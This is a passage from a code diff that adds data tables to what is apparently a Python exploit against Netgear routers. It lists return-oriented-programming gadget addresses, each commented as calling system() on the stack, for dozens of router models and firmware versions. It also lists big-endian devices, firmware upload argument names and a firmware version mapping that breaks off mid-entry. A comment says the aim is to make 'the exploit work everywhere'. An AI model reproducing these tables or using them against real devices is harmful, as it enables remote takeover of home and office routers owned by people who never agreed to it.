calls system($sp) + "1.0.3.12" : 0x2c460, + "1.0.3.10" : 0x2c430, + "1.0.1.20" : 0x280dc, + "1.0.1.18" : 0x280dc, + "1.0.1.16" : 0x280dc, + "1.0.1.14" : 0x280dc, + }, + "R6250" : { + # 0) gadget: calls system($sp) + "1.0.4.38" : 0x2f2dc, + "1.0.4.36" : 0x2f2dc, + "1.0.4.34" : 0x2f2e4, + "1.0.4.26" : 0x2eba0, + "1.0.4.20" : 0x2e82c, + "1.0.4.16" : 0x2d82c, + "1.0.4.14" : 0x2d718, + "1.0.4.12" : 0x2d708, + "1.0.4.08" : 0x2d0b0, + "1.0.4.06" : 0x2cf58, + "1.0.4.02" : 0x2ccac, + "1.0.3.12" : 0x2c430, + "1.0.3.06" : 0x2c430, + "1.0.1.84" : 0x28100, + "1.0.1.82" : 0x28100, + "1.0.1.80" : 0x28100, + "1.0.0.72" : 0x27cd8, + "1.0.0.70" : 0x27cd8, + "1.0.0.62" : 0x27cd8, + }, + "R6300" : { + # 0) gadget: calls system($sp+0x78) + "1.0.2.80" : 0x44727C, + "1.0.2.78" : 0x446C2C, + "1.0.2.76" : 0x446C2C, + "1.0.2.70" : 0x446A3C, + "1.0.2.68" : 0x446A3C, + "1.0.2.38" : 0x44673C, + "1.0.2.36" : 0x44673C, + "1.0.2.26" : 0x445E1C, + "1.0.2.14" : 0x4443CC, + "1.0.2.10" : 0x4443CC, + "1.0.0.90" : 0x4443CC, + "1.0.0.68" : 0x44439C, + }, + "R6300V2" : { + # 0) gadget: calls system($sp) + "1.0.4.36" : 0x2a65c, + "1.0.4.34" : 0x2a65c, + "1.0.4.32" : 0x2A53C, + "1.0.4.28" : 0x29fc0, + "1.0.4.24" : 0x29ee8, + "1.0.4.8" : 0x295d0, + "1.0.4.6" : 0x290f0, + "1.0.4.2" : 0x28c10, + "1.0.3.30" : 0x28c10, + "1.0.3.28" : 0x286d4, + "1.0.3.26" : 0x286d4, + "1.0.3.22" : 0x28728, + "1.0.3.8" : 0x2862C, + "1.0.3.6CH" : 0x2bd0c, + "1.0.3.2" : 0x2862c, + "1.0.2.86" : 0x27cfc, + "1.0.2.72" : 0x27cfc, + "1.0.1.72" : 0x27cd8, + }, + "R6400" : { + # 0) gadget: calls system($sp) + "1.0.1.52" : 0x31994, + "1.0.1.50" : 0x31974, + "1.0.1.46" : 0x31884, + "1.0.1.44" : 0x31244, + "1.0.1.42" : 0x31204, + "1.0.1.36" : 0x30D3C, + "1.0.1.34" : 0x30ba8, + "1.0.1.26" : 0x30a5c, + "1.0.1.24" : 0x30a10, + "1.0.1.22" : 0x30904, + "1.0.1.20" : 0x30648, + "1.0.1.18" : 0x302fc, + "1.0.1.12" : 0x2fdf4, + "1.0.1.6" : 0x2f6b4, + "1.0.0.26" : 0x2f6b4, + "1.0.0.24" : 0x2e96c, + "1.0.0.20" : 0x2e840, + "1.0.0.14" : 0x2e924, + }, + "R6400V2" : { + # 0) gadget: calls system($sp) + "1.0.4.84" : 0xf9c4, + "1.0.4.82" : 0xf9c4, + "1.0.4.78" : 0xf980, + "1.0.3.66" : 0xf0b0, + "1.0.2.66" : 0xf0b0, + "1.0.2.62" : 0xf0b0, + "1.0.2.60" : 0xf038, + "1.0.2.56" : 0x32078, + "1.0.2.52" : 0x31718, + "1.0.2.50" : 0x314c4, + "1.0.2.46" : 0x31414, + "1.0.2.44" : 0x313e8, + "1.0.2.34" : 0x30e54, + "1.0.2.32" : 0x30e1c, + "1.0.2.14" : 0x30a94, + }, + "R6700" : { + # 0) gadget: calls system($sp) + "1.0.2.8" : 0x3cfa0, + "1.0.2.6" : 0x38ff4, + "1.0.1.48" : 0x3818c, + "1.0.1.46" : 0x37e3c, + "1.0.1.44" : 0x37d1c, + "1.0.1.36" : 0x3779c, + "1.0.1.32" : 0x37704, + "1.0.1.26" : 0x371f8, + "1.0.1.22" : 0x361d0, + "1.0.1.20" : 0x35d8c, + "1.0.1.16" : 0x35750, + "1.0.1.14" : 0x2efac, + "1.0.0.26" : 0x2ed28, + "1.0.0.24" : 0x2ed28, + "1.0.0.2" : 0x2d5c8, + }, + "R6700V3" : { + # 0) gadget: calls system($sp) + "1.0.4.84" : 0xf9c4, + "1.0.4.82" : 0xf9c4, + "1.0.4.78" : 0xf980, + "1.0.3.66" : 0xf0b0, + "1.0.2.66" : 0xf0b0, + "1.0.2.62" : 0xf0b0, + "1.0.2.60" : 0xf038, + "1.0.2.56" : 0x32078, + "1.0.2.52" : 0x31718, + }, + "R6900" : { + # 0) gadget: calls system($sp) + "1.0.2.8" : 0x3cfa0, + "1.0.2.6" : 0x38ff4, + "1.0.2.4" : 0x38a3c, + "1.0.1.48" : 0x3818c, + "1.0.1.46" : 0x37e3c, + "1.0.1.44" : 0x37d1c, + "1.0.1.34" : 0x379e4, + "1.0.1.28" : 0x3794c, + "1.0.1.26" : 0x371f8, + "1.0.1.22" : 0x361d0, + "1.0.1.20" : 0x35d8c, + "1.0.1.16" : 0x35750, + "1.0.1.14" : 0x2efb4, + "1.0.0.4" : 0x2ed30, + "1.0.0.2" : 0x2ed30, + }, + "R6900P" : { + # 0) gadget: calls system($sp) + "1.3.1.64" : 0x3a21c, + "1.3.1.44" : 0x39904, + "1.3.1.26" : 0x37114, + "1.3.0.20" : 0x37114, + "1.3.0.8" : 0x36ff4, + "1.2.0.22" : 0x36ad0, + "1.0.1.14" : 0x369f4, + "1.0.0.58" : 0x367b8, + "1.0.0.46" : 0x3600c, + }, + "R7000" : { + # 0) gadget: calls system($sp) + "0.96" : 0x2c990, + "1.22" : 0x2cc00, + "2.16" : 0x2cbec, + "2.19" : 0x2d04c, + "3.24" : 0x2d608, + "3.56" : 0x2d568, + "3.60" : 0x2de64, + "3.68" : 0x2d5c8, + "3.80" : 0x2d5c0, + "4.18" : 0x2ecac, + "4.28" : 0x2ecf4, + "4.30" : 0x2ed30, + "5.64" : 0x32520, + "5.70" : 0x32768, + "7.2" : 0x32768, + "7.6" : 0x329e8, + "7.10" : 0x32a44, + "7.12" : 0x36070, + "8.34" : 0x37528, + "9.6" : 0x3763C, + "9.10" : 0x3794C, + "9.12" : 0x3794C, + "9.14" : 0x37B08, + "9.18" : 0x37B14, + "9.26" : 0x37d1c, + "9.28" : 0x37dbc, + "9.32" : 0x38198, + "9.34" : 0x38174, + "9.42" : 0x38978, + "9.60" : 0x38FF4, + "9.64" : 0x3C3C4, + "9.88" : 0x3cfb4, + "11.100" : 0x3d000, + }, + "R7000P" : { + # 0) gadget: calls system($sp) + "1.3.1.64" : 0x3a21c, + "1.3.1.44" : 0x39904, + "1.3.1.26" : 0x37114, + "1.3.0.20" : 0x37114, + "1.3.0.8" : 0x36ff4, + "1.2.0.22" : 0x36ad0, + "1.0.1.14" : 0x369f4, + "1.0.0.58" : 0x367b8, + "1.0.0.56" : 0x36658, + "1.0.0.50" : 0x35f40, + "1.0.0.46" : 0x3600c, + "1.0.0.44" : 0x35dc8, + }, + "R7100LG" : { + # 0) gadget: calls system($sp) + "1.0.0.52" : 0x342d4, + "1.0.0.50" : 0x341e4, + "1.0.0.48" : 0x33ec0, + "1.0.0.46" : 0x33e80, + "1.0.0.42" : 0x339ac, + "1.0.0.40" : 0x3397c, + "1.0.0.38" : 0x338d8, + "1.0.0.36" : 0x338d8, + "1.0.0.34" : 0x3381c, + "1.0.0.32" : 0x33788, + "1.0.0.30" : 0x33520, + "1.0.0.28" : 0x3326c, + "1.0.0.24" : 0x32f30, + }, + "R7300" : { + # 0) gadget: calls system($sp) + "1.0.0.74" : 0x33fb0, + "1.0.0.70" : 0x33fb8, + "1.0.0.68" : 0x33b70, + "1.0.0.62" : 0x33740, + "1.0.0.60" : 0x33588, + "1.0.0.56" : 0x33468, + "1.0.0.54" : 0x33458, + "1.0.0.52" : 0x331d0, + "1.0.0.46" : 0x32d20, + "1.0.0.44" : 0x32ae4, + "1.0.0.32" : 0x3267c, + "1.0.0.26" : 0x32628, + }, + "R7850" : { + # 0) gadget: calls system($sp) + "1.0.5.48" : 0x36dd0, + "1.0.4.46" : 0x36da8, + "1.0.4.42" : 0x365b0, + }, + "R7900" : { + # 0) gadget: calls system($sp) + "1.0.4.22" : 0x36da8, + "1.0.3.18" : 0x36da8, + "1.0.3.10" : 0x36c80, + "1.0.3.8" : 0x365b0, + "1.0.2.16" : 0x36110, + "1.0.2.10" : 0x346d8, + "1.0.1.26" : 0x34028, + "1.0.1.18" : 0x33fe4, + "1.0.1.12" : 0x336f8, + "1.0.1.8" : 0x332dc, + "1.0.1.4" : 0x33058, + "1.0.0.10" : 0x3290c, + "1.0.0.8" : 0x326ec, + "1.0.0.6" : 0x2f48c, + "1.0.0.2" : 0x2f470, + }, + "R8000" : { + # 0) gadget: calls system($sp) + "1.0.4.46" : 0x36dac, + "1.0.4.28" : 0x365b0, + "1.0.4.18" : 0x36110, + "1.0.4.12" : 0x346d8, + "1.0.4.4" : 0x34310, + "1.0.4.2" : 0x34284, + "1.0.3.54" : 0x34028, + "1.0.3.48" : 0x33fe4, + "1.0.3.46" : 0x33e84, + "1.0.3.36" : 0x33ac4, + "1.0.3.32" : 0x336f8, + "1.0.3.26" : 0x332dc, + "1.0.3.4" : 0x33058, + "1.0.2.46" : 0x3290c, + "1.0.2.44" : 0x326f4, + "1.0.1.16" : 0x2f370, + "1.0.0.110" : 0x2f2a0, + "1.0.0.108" : 0x2f2a8, + "1.0.0.102" : 0x2f2a0, + "1.0.0.100" : 0x2f0f0, + "1.0.0.90" : 0x2f0e8, + "1.0.0.76" : 0x2f0ac, + "1.0.0.74" : 0x2f068, + "1.0.0.68" : 0x2f0ac, + "1.0.0.46" : 0x2f0ac, + }, + "R8300" : { + # 0) gadget: calls system($sp) + "1.0.2.130" : 0x35B18, + "1.0.2.128" : 0x35B18, + "1.0.2.122" : 0x355fc, + "1.0.2.116" : 0x35258, + "1.0.2.106" : 0x34f40, + "1.0.2.100" : 0x34d38, + "1.0.2.94" : 0x34d8c, + "1.0.2.86" : 0x348b8, + "1.0.2.80" : 0x348b8, + "1.0.2.48" : 0x340b8, + }, + "R8500" : { + # 0) gadget: calls system($sp) + "1.0.2.130" : 0x35b18, + "1.0.2.128" : 0x35B18, + "1.0.2.122" : 0x355fc, + "1.0.2.116" : 0x35258, + "1.0.2.106" : 0x34f40, + "1.0.2.100" : 0x34d38, + "1.0.2.94" : 0x34d8c, + "1.0.2.86" : 0x348b8, + "1.0.2.80" : 0x348b8, + "1.0.2.64" : 0x34104, + "1.0.2.54" : 0x33f30, + "1.0.2.30" : 0x33dd4, + "1.0.2.26" : 0x33d9c, + "1.0.0.56" : 0x33da8, + "1.0.0.52" : 0x33da8, + "1.0.0.42" : 0x33da8, + "1.0.0.28" : 0x33da8, + }, + "RS400" : { + # 0) gadget: calls system($sp) + "1.5.0.34" : 0x10120, + }, + "WGR614V8" : { + # 0) gadget: calls system($sp+0x18) + "1.2.10" : 0x43B9C0, + "1.2.10NA" : 0x43B9C0, + "1.1.24" : 0x43A46C, + "1.1.24NA" : 0x43A46C, + "1.1.2" : 0x438DAC, + "1.1.2NA" : 0x438DCC, + "1.1.11" : 0x43A56C, + "1.1.11NA" : 0x43A56C, + "1.1.1NA" : 0x438A8C, + "1.1.20" : 0x43A56C, + "1.1.20NA" : 0x43A56C, + }, + "WGR614V9" : { + # 0) gadget: calls system($sp+0x30) + "1.2.32" : 0x450280, + "1.2.32NA" : 0x450290, + "1.2.30" : 0x450280, + "1.2.30NA" : 0x450290, + "1.2.24" : 0x44E730, + "1.2.24NA" : 0x44E750, + "1.2.6" : 0x44C72C, + "1.2.6NA" : 0x44C74C, + "1.2.2" : 0x44D1BC, + "1.2.2NA" : 0x44D1DC, + "1.0.18" : 0x450E3C, + "1.0.18NA" : 0x450D8C, + "1.0.15" : 0x44FD60, + "1.0.15NA" : 0x44FDA0, + "1.0.9NA" : 0x44EE40, + }, + "WGR614V10" : { + # 0) gadget: calls system($sp+0x30) + "1.0.2.66" : 0x480294, + "1.0.2.66NA" : 0x47FEEC, + "1.0.2.60" : 0x47F6CC, + "1.0.2.60NA" : 0x47FA94, + "1.0.2.58NA" : 0x47FA94, + "1.0.2.54" : 0x4775B4, + "1.0.2.54NA" : 0x4775B4, + "1.0.2.26" : 0x46A5E4, + "1.0.2.26NA" : 0x46A5F4, + "1.0.2.18" : 0x467D7C, + "1.0.2.18NA" : 0x467D8C, + }, + "WGT624V4" : { + # 0) gadget: calls system($sp+0x18) + "2.0.13.2" : 0x42AFF4, + "2.0.13" : 0x42AFF4, + "2.0.13NA" : 0x42AFF4, + "2.0.12" : 0x42AFA4, + "2.0.12NA" : 0x42AFA4, + "2.0.6NA" : 0x42A1F4, + }, + "WN2500RP" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.30" : 0x44E780, + "1.0.0.26" : 0x44E780, + "1.0.0.24" : 0x44E780, + }, + "WN2500RPV2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.1.54" : 0x46335C, + "1.0.1.50" : 0x462AFC, + "1.0.1.46" : 0x460E54, + "1.0.1.42" : 0x460D44, + "1.0.0.30" : 0x44A804, + }, + "WN3000RP" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s3 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.2.64" : [0x443048, 0x40EA14], + + # 0) gadget: calls system($sp+0x18) + "1.0.1.36" : 0x4395e0, + "1.0.1.34" : 0x4395d0, + "1.0.1.18" : 0x438440, + "1.0.0.12" : 0x445370, + }, + "WN3100RP" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.20" : 0x439750, + "1.0.0.16" : 0x439550, + "1.0.0.14" : 0x439290, + "1.0.0.6" : 0x439400, + }, + "WN3500RP" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.22" : [0x436BC4, 0x415C68], + "1.0.0.20" : [0x436BD4, 0x415C98], + "1.0.0.18" : [0x436BA4, 0x415C40], + "1.0.0.16" : [0x436C74, 0x415BF0], + "1.0.0.14" : [0x436E44, 0x415D90], + "1.0.0.12" : [0x436DC4, 0x415D90], + }, + "WNCE3001" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.50" : 0x412c68, + "1.0.0.46" : 0x412c68, + "1.0.0.44" : 0x412c68, + "1.0.0.38" : 0x412bb8, + }, + "WNDR3300" : { + # 0) gadget: calls system($sp+0x18) + "1.0.45" : 0x432C6C, + "1.0.45NA" : 0x432C6C, + "1.0.29" : 0x431EDC, + "1.0.29NA" : 0x431EDC, + "1.0.27NA" : 0x4389EC, + "1.0.26" : 0x4388CC, + "1.0.26NA" : 0x4388CC, + "1.0.23NA" : 0x43919C, + "1.0.14" : 0x438A8C, + "1.0.14NA" : 0x438A8C, + }, + "WNDR3300V2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.26" : 0x448020, + }, + "WNDR3400" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.52" : [0x490950, 0x412DF8], + "1.0.0.50" : [0x4908C0, 0x412DF8], + + # 0) gadget: calls system($sp+0x18) + "1.0.0.38" : 0x4B6880, + "1.0.0.34" : 0x4B6320, + }, + "WNDR3400V2" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.54" : 0x44858C, + "1.0.0.52" : 0x44848C, + "1.0.0.38" : 0x44632C, + "1.0.0.34" : 0x44629C, + "1.0.0.16" : 0x4420DC, + "1.0.0.12" : 0x4420DC, + }, + "WNDR3400V3" : { + # 0) gadget: calls system($sp+0x78) + "1.0.1.24" : 0x44C4BC, + "1.0.1.22" : 0x44BFFC, + "1.0.1.18" : 0x44BABC, + "1.0.1.16" : 0x44B7EC, + "1.0.1.14" : 0x44B53C, + "1.0.1.12" : 0x44929C, + "1.0.1.8" : 0x448CEC, + "1.0.1.4" : 0x448A2C, + "1.0.1.2" : 0x448A2C, + "1.0.0.48" : 0x448A2C, + "1.0.0.46" : 0x448A2C, + "1.0.0.38" : 0x44717C, + "1.0.0.22" : 0x44626C, + "1.0.0.20" : 0x44623C, + }, + "WNDR3700V3" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.0.42" : [0x610070+0x72c, 0x40BB10, 0x4206FC], + "1.0.0.38" : [0x60e3d0+0x71c, 0x40BA14, 0x41FB70], + "1.0.0.36" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0], + "1.0.0.30" : [0x60d080+0x71c, 0x40B92C, 0x41F8B0], + "1.0.0.22" : [0x608f50+0x720, 0x40B868, 0x41F6A0], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.18" : [0x490590, 0x490550], + }, + "WNDR4000" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # - The end of the _init_proc function + # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset + # - The beginning of the build_asp_handler_table function + "1.0.2.10" : [0x6397f0+0x73c, 0x40BBC8, 0x420E6C], + "1.0.2.6" : [0x60ffe0+0x72c, 0x40BAB4, 0x42066C], + "1.0.2.4" : [0x60e040+0x720, 0x40B9B0, 0x41FB50], + "1.0.2.2" : [0x60da60+0x720, 0x40B91C, 0x41F8E0], + "1.0.0.94" : [0x60da60+0x720, 0x40B91C, 0x41F8E0], + "1.0.0.90" : [0x60cfa0+0x71c, 0x40B8C0, 0x41F890], + "1.0.0.88" : [0x608f20+0x71c, 0x40B844, 0x41F680], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.82" : [0x490860, 0x490820], + "1.0.0.66" : [0x48CDC0, 0x48CD80], + }, + "WNDR4500" : { + # 0) gadget: calls system($sp+0x78) + "1.0.1.46" : 0x447D5C, + "1.0.1.40" : 0x44719C, + "1.0.1.38" : 0x4460ec, + "1.0.1.36" : 0x4460ec, + "1.0.1.20" : 0x4459fc, + "1.0.1.18" : 0x44584C, + "1.0.1.6" : 0x4430dc, + "1.0.0.58" : 0x44257C, + "1.0.0.50" : 0x44257c, + "1.0.0.40" : 0x44257c, + }, + "WNDR4500V2" : { + # 0) gadget: calls system($sp+0x78) + "1.0.0.72" : 0x45005C, + "1.0.0.68" : 0x44FF2C, + "1.0.0.64" : 0x44F99C, + "1.0.0.62" : 0x44F09C, + "1.0.0.60" : 0x44EE5C, + "1.0.0.56" : 0x44EE5C, + "1.0.0.54" : 0x44E0FC, + "1.0.0.50" : 0x44D6DC, + "1.0.0.42" : 0x44D6DC, + "1.0.0.36" : 0x4467EC, + "1.0.0.26" : 0x44621C, + }, + "WNR834BV2" : { + # 0) gadget: calls system($sp+0x18) + "2.1.13" : 0x43902C, + "2.1.13NA" : 0x43902C, + "2.0.8" : 0x43894C, + "2.0.8NA" : 0x43894C, + "1.0.32" : 0x43799C, + "1.0.32NA" : 0x43799C, + }, + "WNR1000V3" : { + # 0) gadget: calls system($sp+0x18) + "1.0.2.72" : 0x460060, + "1.0.2.72NA" : 0x460060, + "1.0.2.68" : 0x45F604, + "1.0.2.68NA" : 0x45F604, + "1.0.2.62" : 0x454BB4, + "1.0.2.62NA" : 0x454BB4, + "1.0.2.60" : 0x454BB4, + "1.0.2.60NA" : 0x454BB4, + "1.0.2.54" : 0x450ED0, + "1.0.2.54NA" : 0x450ED0, + "1.0.2.28" : 0x4448A0, + "1.0.2.28NA" : 0x4448A0, + "1.0.2.26" : 0x4446A0, + "1.0.2.26NA" : 0x4446A0, + "1.0.2.18" : 0x442D50, + "1.0.2.18NA" : 0x442D50, + "1.0.2.4" : 0x440F70, + }, + "WNR2000V2" : { + # 0) gadget: calls system($sp+0x78) + "1.2.0.8" : 0x434D04, + "1.2.0.8NA" : 0x434CF4, + "1.2.0.6" : 0x433F34, + "1.2.0.6NA" : 0x433F34, + "1.2.0.4" : 0x433EA4, + "1.2.0.4NA" : 0x433E94, + + # 0) gadget: calls system($sp+0x18) + "1.0.0.40" : 0x4446A0, + "1.0.0.40NA" : 0x4446A0, + "1.0.0.35" : 0x43F340, + "1.0.0.34" : 0x43F340, + "1.0.0.34NA" : 0x43F340, + }, + "WNR3500" : { + # 0) gadget: calls system($sp) + "1.0.36NA" : 0x2CBD0, + "1.0.30" : 0x2a714, + "1.0.29NA" : 0x2a72c, + "1.0.22" : 0x2a4c4, + "1.0.22NA" : 0x2a4fc, + "1.0.15NA" : 0x2a3c8, + "1.0.10NA" : 0x2a1f4, + }, + "WNR3500V2" : { + # 0) gadget: calls system($sp+0xac) + "1.2.2.28" : 0x435FA0, + "1.2.2.28NA" : 0x435F60, + + # 0) gadget: calls system($sp+0x18) + "1.0.2.14" : 0x48D1EC, + "1.0.2.14NA" : 0x48CFAC, + "1.0.2.10" : 0x484D5C, + "1.0.2.10NA" : 0x484B1C, + "1.0.0.64" : 0x4350DC, + "1.0.0.64NA" : 0x4350DC, + }, + "WNR3500L" : { + # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address + # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp); + # 2) gadget: set $a0 to $sp+0x40, and calls memset + "1.2.2.48NA" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.44" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.44NA" : [0x5740f0+0x630, 0x409830, 0x409D30], + "1.2.2.40" : [0x568490+0x618, 0x4095AC, 0x409AB4], + "1.2.2.40NA" : [0x568360+0x618, 0x4095AC, 0x409AB4], + "1.2.2.30" : [0x568490+0x618, 0x4095AC, 0x409AB4], + "1.2.2.30NA" : [0x568360+0x618, 0x4095AC, 0x409AB4], + + # 0) gadget: calls system($sp+0x18) + "1.0.2.50" : 0x4A6574, + "1.0.2.50NA" : 0x4A6334, + "1.0.2.26" : 0x4A3B7C, + "1.0.2.26NA" : 0x4A392C, + "1.0.0.88" : 0x438564, + "1.0.0.88NA" : 0x438564, + "1.0.0.86" : 0x438564, + "1.0.0.86NA" : 0x438564, + }, + "WNR3500LV2" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x80 and calls $t9 + "1.2.0.56" : [0x4458F8, 0x4A6EDC], + "1.2.0.54" : [0x4456C8, 0x4A6BEC], + "1.2.0.50" : [0x445578, 0x4A68EC], + "1.2.0.48" : [0x445268, 0x4A4814], + "1.2.0.46" : [0x444BF8, 0x4A4098], + "1.2.0.44" : [0x445038, 0x4A3C18], + "1.2.0.40" : [0x443C28, 0x4A2808], + "1.2.0.38" : [0x443C18, 0x4A2718], + "1.2.0.34" : [0x4436F8, 0x4A1674], + "1.2.0.32" : [0x4436F8, 0x4A1674], + "1.2.0.28" : [0x4436F8, 0x4A1684], + "1.2.0.26" : [0x4436F8, 0x4A1684], + "1.2.0.20" : [0x43A8B8, 0x492D00], + "1.2.0.18" : [0x43A8B8, 0x492D00], + "1.2.0.16" : [0x43A8B8, 0x492D00], + "1.0.0.14" : [0x43758C, 0x48A850], + + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.10" : [0x4371FC, 0x4177B0], + }, + "XR300" : { + # 0) gadget: calls system($sp) + "1.0.3.38" : 0x33258, + "1.0.3.34" : 0x33258, + "1.0.3.26" : 0x329b0, + "1.0.2.24" : 0x329a4, + "1.0.2.18" : 0x32a84, + "1.0.1.4" : 0x325dc, + }, +} + +# Devices that are big endian +big_endian_devices = ["D6220", "D6300", "D6400", "D7000V2", "DGN2200", "DGN2200M", "DGN2200V4", "DGND3700", "MBM621", + "MBRN3000", "WGT624V4", "WNCE3001"] + +# The argument name for the file upload. If not listed, it's mtenFWUpload +# It would be real nice if Netgear could standardize on how they update, so I could +# make the exploit work everywhere without handling a dozen corner cases. +argument_names = { + "EX3700" : { + "1.0.0.22" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX3800" : { + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX3920" : { + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.44" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.64" : "update_file", + "1.0.0.68" : "update_file", + "1.0.0.70" : "update_file", + "1.0.0.72" : "update_file", + "1.0.0.76" : "update_file", + "1.0.0.78" : "update_file", + }, + "EX6000" : { + "1.0.0.10" : "update_file", + "1.0.0.20" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.38" : "update_file", + }, + "EX6100" : { + "1.0.2.6" : "update_file", + "1.0.1.36" : "update_file", + "1.0.2.16" : "update_file", + "1.0.2.18" : "update_file", + "1.0.2.24" : "update_file", + }, + "EX6120" : { + "1.0.0.4" : "update_file", + "1.0.0.8" : "update_file", + "1.0.0.14" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.36" : "update_file", + "1.0.0.40" : "update_file", + "1.0.0.42" : "update_file", + "1.0.0.46" : "update_file", + "1.0.0.48" : "update_file", + }, + "EX6130" : { + "1.0.0.12" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.20" : "update_file", + "1.0.0.22" : "update_file", + "1.0.0.24" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + }, + "EX6150" : { + "1.0.0.14" : "updateFile", + "1.0.0.16" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.34" : "update_file", + "1.0.0.42" : "update_file", + }, + "EX6200" : { + "1.0.3.68" : "update_file", + "1.0.3.74" : "update_file", + "1.0.3.76" : "update_file", + "1.0.3.82" : "update_file", + "1.0.3.88" : "update_file", + "1.0.3.90" : "update_file", + }, + "EX6920" : { + "1.0.0.4" : "update_file", + "1.0.0.8" : "update_file", + "1.0.0.14" : "update_file", + "1.0.0.16" : "update_file", + "1.0.0.26" : "update_file", + "1.0.0.28" : "update_file", + "1.0.0.30" : "update_file", + "1.0.0.32" : "update_file", + "1.0.0.36" : "update_file", + "1.0.0.40" : "update_file", + }, + "EX7000" : { + "1.0.0.30" : "updateFile", + "1.0.0.32" : "updateFile", + "1.0.0.36" : "update_file", + "1.0.0.38" : "update_file", + "1.0.0.42" : "update_file", + "1.0.0.50" : "update_file", + "1.0.0.56" : "update_file", + "1.0.0.58" : "update_file", + "1.0.0.62" : "update_file", + "1.0.0.66" : "update_file", + "1.0.1.78" : "update_file", + "1.0.1.80" : "update_file", + "1.0.1.84" : "update_file", + }, + "WN2500RPV2" : { + "1.0.1.42" : "update_file", + "1.0.1.46" : "update_file", + "1.0.1.50" : "update_file", + "1.0.1.54" : "update_file", + }, +} + +# A mapping of human friendly versions to the versions returned by currentsetting.htm +firmware_version_to_human_version = { + "AC1450" : { + "V1.0.0.36_10.0.17" : "1.0.0.36", + "V1.0.0.34_10.0.16" : "1.0.0.34", + "V1.0.0.22_1.0.10" : "1.0.0.22", + "V1.0.0.14_1.0.6" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.6_1.0.3" : "1.0.0.6", + }, + "D6220" : { + "V1.0.0.52_1.0.52" : "1.0.0.52", + "V1.0.0.48_1.0.48" : "1.0.0.48", + "V1.0.0.46_1.0.46" : "1.0.0.46", + "V1.0.0.44_1.0.44" : "1.0.0.44", + "V1.0.0.40_1.0.40" : "1.0.0.40", + "V1.0.0.36_1.0.36" : "1.0.0.36", + "V1.0.0.34_1.0.34" : "1.0.0.34", + "V1.0.0.32_1.0.32" : "1.0.0.32", + "V1.0.0.28_1.0.28" : "1.0.0.28", + "V1.0.0.24_1.0.24" : "1.0.0.24", + "V1.0.0.22_1.0.22" : "1.0.0.22", + "V1.0.0.16_1.0.16" : "1.0.0.16", + }, + "D6300" : { + "V1.0.0.102_1.0.102" : "1.0.0.102", + "V1.0.0.96_1.1.96" : "1.0.0.96", + "V1.0.0.90_1.0.90" : "1.0.0.90", + "V1.0.0.88-1.0.88" : "1.0.0.88", + "V1.0.0.76_1.0.76" : "1.0.0.76", + "V1.0.0.72_1.0.72" : 